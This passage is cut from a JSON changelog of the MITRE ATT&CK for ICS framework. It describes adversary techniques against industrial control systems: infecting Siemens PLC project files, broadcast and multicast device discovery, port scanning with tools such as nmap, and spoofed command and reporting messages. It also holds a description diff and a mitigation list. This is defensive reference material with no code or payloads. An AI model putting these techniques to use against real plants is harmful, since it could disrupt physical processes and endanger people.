                    "description": "Adversaries may infect Siemens PLC project files (i.e., Step 7, WinCC, etc.) to achieve [Execution](https://attack.mitre.org/tactics/TA0104), [Persistence](https://attack.mitre.org/tactics/TA0110), and [Lateral Movement](https://attack.mitre.org/tactics/TA0109) objectives. Adversaries may modify an existing project file or bring their own project files into the environment.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)\n\nThe ability for an adversary to deploy an infected project file relies on access to a workstation with Siemens PLC programming software installed on it from which a program download can be performed.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0873/001",
                            "external_id": "T0873.001"
                        },
                        {
                            "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
                            "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024.",
                            "url": "https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c55f0be5-044e-4577-8095-65b37680d28c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:21.227000+00:00",
                    "modified": "2026-04-23 19:43:10.464000+00:00",
                    "name": "Broadcast Discovery",
                    "description": "Adversaries may perform broadcast discovery requests to enumerate systems and devices on a network. Broadcast discovery works by one system or device sending messages to all systems and devices on a network (or subnet) and then waiting for a response. If a response is received that means the system or device that responded is live and can communicate over that protocol. Adversaries may leverage different protocols supported on the network for sending broadcast messages. \n\nSome common OT protocols that have broadcast discovery mechanisms are Building Automation and Control Network (BACNet) Who-Is requests, Common Industrial Protocol (CIP) List Identity User Datagram Protocol (UDP) broadcast requests, and Siemens S7 broadcast identification requests.(Citation: Broadcasting BACnet)(Citation: Cisco Active Discovery)\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0846/002",
                            "external_id": "T0846.002"
                        },
                        {
                            "source_name": "Cisco Active Discovery",
                            "description": "Cisco Systems, Inc.. (2024, March 5). Cisco Cyber Vision Active Discovery Configuration Guide, Release 4.3.0. Retrieved April 23, 2026.",
                            "url": "https://www.cisco.com/c/en/us/td/docs/security/cyber_vision/publications/Active-Discovery/Release-4-3-0/b_Cisco_Cyber_Vision_Active_Discovery_Configuration_Guide.pdf"
                        },
                        {
                            "source_name": "Broadcasting BACnet",
                            "description": "H. Michael Newman. (2010, November). Broadcasting BACnet\u00ae. Retrieved April 23, 2026.",
                            "url": "https://bacnet.org/wp-content/uploads/sites/4/2022/06/Newman_2010.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--64bbc1b2-101f-4322-af1d-0c9cc25cef91",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:21.726000+00:00",
                    "modified": "2026-04-23 19:45:38.166000+00:00",
                    "name": "Multicast Discovery",
                    "description": "Adversaries may perform multicast discovery requests which is when one system or device sends messages to all systems and devices in a pre-defined group on a network (or subnet) and then waits for a response. If a response is received that means the system or device that responded is live and can communicate over that protocol.  Multicast discovery tends to be stealthier than broadcast discovery because every system or device on the network (or subnet) is not being messaged. \n\nOne common OT protocol that has a multicast discovery mechanism is the Process Field Network (PROFINET) Discovery and Configuration Protocol (DCP) with its Identify All requests.(Citation: Cisco Active Discovery)\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0846/003",
                            "external_id": "T0846.003"
                        },
                        {
                            "source_name": "Cisco Active Discovery",
                            "description": "Cisco Systems, Inc.. (2024, March 5). Cisco Cyber Vision Active Discovery Configuration Guide, Release 4.3.0. Retrieved April 23, 2026.",
                            "url": "https://www.cisco.com/c/en/us/td/docs/security/cyber_vision/publications/Active-Discovery/Release-4-3-0/b_Cisco_Cyber_Vision_Active_Discovery_Configuration_Guide.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5d24bb1d-4487-4923-ae3a-8e679092ac7a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:20.714000+00:00",
                    "modified": "2026-04-23 19:41:07.822000+00:00",
                    "name": "Port Scan",
                    "description": "Adversaries may perform a port scan on a system, device, or network to identify live hosts, enumerate open ports and running services, identify operating systems, and map out the network.(Citation: NIST SP 800-82r3) The results of a port scan may inform adversary [Discovery](https://attack.mitre.org/tactics/TA0102), [Lateral Movement](https://attack.mitre.org/tactics/TA0109), and vulnerability exploitation decisions ([Exploitation for Evasion](https://attack.mitre.org/techniques/T0820), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T0890), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T0866)). \n\nSome common tools for executing a port scan include `nmap`, `netcat`, and the Advanced Port Scanner.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0846/001",
                            "external_id": "T0846.001"
                        },
                        {
                            "source_name": "NIST SP 800-82r3",
                            "description": "Keith Stouffer. (2023, September). Guide to Operational Technology  (OT) Security. Retrieved April 22, 2026.",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e17cdc00-8b58-4e5f-9d50-4cad1592c4c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:50:34.487000+00:00",
                    "modified": "2026-04-23 18:54:29.294000+00:00",
                    "name": "Unauthorized Message",
                    "description": "Adversaries may send unauthorized messages to ICS systems and devices to evade defenses or manipulate processes. Unauthorized messages can be categorized as either reporting messages that contain telemetry data about the current state of systems, devices, and processes or as command messages which instruct systems and devices on how to operate. By injecting unauthorized messages, adversaries can make it appear as if everything is working correctly when it isn\u2019t, trigger alarms to misdirect personnel or impact processes, and manipulate controls to disrupt processes.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nAdversaries may send unauthorized messages in an ICS environment using software found within the environment (living-off-the-land, vendor-specific interfaces, etc.), custom tooling leveraging OT protocols and libraries, or by positioning themselves between systems and devices and injecting messages into the communications such as the case with an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "evasion"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1692",
                            "external_id": "T1692"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4344d1b8-968b-4697-9ab9-f9abe5f52265",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:17.053000+00:00",
                    "modified": "2026-04-23 18:59:19.225000+00:00",
                    "name": "Command Message",
                    "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105).(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster.(Citation: Zack Whittaker April 2017)(Citation: Benjamin Freed March 2019)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "evasion"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1692/001",
                            "external_id": "T1692.001"
                        },
                        {
                            "source_name": "Benjamin Freed March 2019",
                            "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ",
                            "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Zack Whittaker April 2017",
                            "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ",
                            "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--527106b3-95a2-4ed2-bf89-db7f0e4d0da0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:17.539000+00:00",
                    "modified": "2026-04-23 19:01:42.644000+00:00",
                    "name": "Reporting Message",
                    "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.\n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "evasion"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1692/002",
                            "external_id": "T1692.002"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-23 19:35:14.939000+00:00",
                    "name": "Project File Infection",
                    "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function.(Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques.(Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.(Citation: PLCdev)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0873",
                            "external_id": "T0873"
                        },
                        {
                            "source_name": "Beckhoff",
                            "description": "Beckhoff   TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ",
                            "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id="
                        },
                        {
                            "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
                            "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024.",
                            "url": "https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en"
                        },
                        {
                            "source_name": "PLCdev",
                            "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22  Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ",
                            "url": "http://www.plcdev.com/book/export/html/373"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 19:35:14.939000+00:00\", \"old_value\": \"2025-04-15 19:59:17.481000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function.(Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques.(Citation: PLCdev) \\n\\nAdversaries may export their own code into project files with conditions to execute at specific intervals.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.(Citation: PLCdev)\", \"old_value\": \"Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \\n\\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \\n+Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function.(Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques.(Citation: PLCdev) \\n \\n-Adversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)\\n+Adversaries may export their own code into project files with conditions to execute at specific intervals.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.(Citation: PLCdev)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to211__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to211__0\"><a href=\"#difflib_chg_to211__top\">t</a></td><td class=\"diff_header\" id=\"from211_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;infect&nbsp;project&nbsp;files&nbsp;with&nbsp;malicio</td><td class=\"diff_next\"><a href=\"#difflib_chg_to211__top\">t</a></td><td class=\"diff_header\" id=\"to211_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;infect&nbsp;project&nbsp;files&nbsp;with&nbsp;malicio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;code.&nbsp;These&nbsp;project&nbsp;files&nbsp;may&nbsp;consist&nbsp;of&nbsp;objects,&nbsp;program</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;code.&nbsp;These&nbsp;project&nbsp;files&nbsp;may&nbsp;consist&nbsp;of&nbsp;objects,&nbsp;program</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;organization&nbsp;units,&nbsp;variables&nbsp;such&nbsp;as&nbsp;tags,&nbsp;documentation,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;organization&nbsp;units,&nbsp;variables&nbsp;such&nbsp;as&nbsp;tags,&nbsp;documentation,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;other&nbsp;configurations&nbsp;needed&nbsp;for&nbsp;PLC&nbsp;programs&nbsp;to&nbsp;function</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;other&nbsp;configurations&nbsp;needed&nbsp;for&nbsp;PLC&nbsp;programs&nbsp;to&nbsp;function</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Beckhoff)&nbsp;Using&nbsp;built&nbsp;in&nbsp;functions&nbsp;of&nbsp;the&nbsp;engin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;Beckhoff)&nbsp;Using&nbsp;built&nbsp;in&nbsp;functions&nbsp;of&nbsp;the&nbsp;engine</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eering&nbsp;software,&nbsp;adversaries&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;download&nbsp;an&nbsp;infe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ering&nbsp;software,&nbsp;adversaries&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;download&nbsp;an&nbsp;infec</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cted&nbsp;program&nbsp;to&nbsp;a&nbsp;PLC&nbsp;in&nbsp;the&nbsp;operating&nbsp;environment&nbsp;enabling&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ted&nbsp;program&nbsp;to&nbsp;a&nbsp;PLC&nbsp;in&nbsp;the&nbsp;operating&nbsp;environment&nbsp;enabling&nbsp;f</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">further&nbsp;[Execution](https://attack.mitre.org/tactics/TA0104)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">urther&nbsp;[Execution](https://attack.mitre.org/tactics/TA0104)&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;[Persistence](https://attack.mitre.org/tactics/TA0110)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;[Persistence](https://attack.mitre.org/tactics/TA0110)&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;PLCdev)&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;export&nbsp;thei</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">echniques.(Citation:&nbsp;PLCdev)&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;export&nbsp;their&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;own&nbsp;code&nbsp;into&nbsp;project&nbsp;files&nbsp;with&nbsp;conditions&nbsp;to&nbsp;execute&nbsp;at&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">own&nbsp;code&nbsp;into&nbsp;project&nbsp;files&nbsp;with&nbsp;conditions&nbsp;to&nbsp;execute&nbsp;at&nbsp;sp</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">specific&nbsp;intervals.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Nicolas&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecific&nbsp;intervals.(Citation:&nbsp;Nicolas&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hu,&nbsp;Eric&nbsp;Chien&nbsp;February&nbsp;2011)&nbsp;Malicious&nbsp;programs&nbsp;allow&nbsp;adver</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Eric&nbsp;Chien&nbsp;February&nbsp;2011)&nbsp;Malicious&nbsp;programs&nbsp;allow&nbsp;adversar</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">saries&nbsp;control&nbsp;of&nbsp;all&nbsp;aspects&nbsp;of&nbsp;the&nbsp;process&nbsp;enabled&nbsp;by&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ies&nbsp;control&nbsp;of&nbsp;all&nbsp;aspects&nbsp;of&nbsp;the&nbsp;process&nbsp;enabled&nbsp;by&nbsp;the&nbsp;PLC</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">PLC.&nbsp;Once&nbsp;the&nbsp;project&nbsp;file&nbsp;is&nbsp;downloaded&nbsp;to&nbsp;a&nbsp;PLC&nbsp;the&nbsp;workst</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.&nbsp;Once&nbsp;the&nbsp;project&nbsp;file&nbsp;is&nbsp;downloaded&nbsp;to&nbsp;a&nbsp;PLC&nbsp;the&nbsp;workstati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;device&nbsp;may&nbsp;be&nbsp;disconnected&nbsp;with&nbsp;the&nbsp;infected&nbsp;project&nbsp;f</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;device&nbsp;may&nbsp;be&nbsp;disconnected&nbsp;with&nbsp;the&nbsp;infected&nbsp;project&nbsp;file</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ile&nbsp;still&nbsp;executing.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;PLCdev)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;still&nbsp;executing.(Citation:&nbsp;PLCdev)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M0922: Restrict File and Directory Permissions",
                            "M0941: Encrypt Sensitive Information",
                            "M0945: Code Signing",
                            "M0947: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
